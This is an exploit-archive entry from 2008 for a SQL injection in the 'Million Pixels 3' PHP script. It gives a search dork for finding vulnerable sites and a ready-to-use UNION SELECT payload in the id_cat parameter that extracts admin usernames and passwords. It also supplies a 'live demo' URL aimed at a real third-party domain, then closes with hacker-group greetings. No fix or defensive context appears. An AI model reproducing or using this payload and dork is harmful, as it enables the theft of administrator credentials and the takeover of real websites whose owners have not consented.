[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
# Published : 2008-07-11
# Author : Hussin X
# Previous Title : Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability
# Next Title : DreamNews Manager (id) Remote SQL Injection Vulnerability
#################################################################
#
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
# =
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
# =
#========================================================
#
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK : inurl: "tops_top.php? id_cat ="
#################################################################
Exploit:
www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
L!VE DEMO:
http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
# www.Syue.com [2008-07-11]